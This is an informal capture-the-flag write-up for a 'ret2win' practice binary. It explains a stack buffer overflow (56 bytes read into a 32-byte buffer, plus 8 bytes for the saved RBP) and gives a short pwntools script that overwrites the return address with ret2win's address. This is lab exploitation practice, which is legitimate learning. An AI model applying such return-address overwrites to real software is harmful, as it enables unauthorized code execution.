Theres a ret2win function that I need to run.
Main function points to a pwnme function.
Ok, there is a buffer overflow here, since it reads in 56 bytes into a 32 byte buffer.
So, I have to put in 32 bytes of anything with the address of ret2win.
But it does not work, because need to overwrite the RBP also, thats another 8 bytes buffer added.
I got the flag (I am not sure why the program is not cat-ing out the flag prob something with the permissions).
from pwn import * p = process('./ret2win') p.recv() buffer = b"A"*40 ret2win = p64(0x0000000000400756) p.sendline(buffer + ret2win) print(p.recv())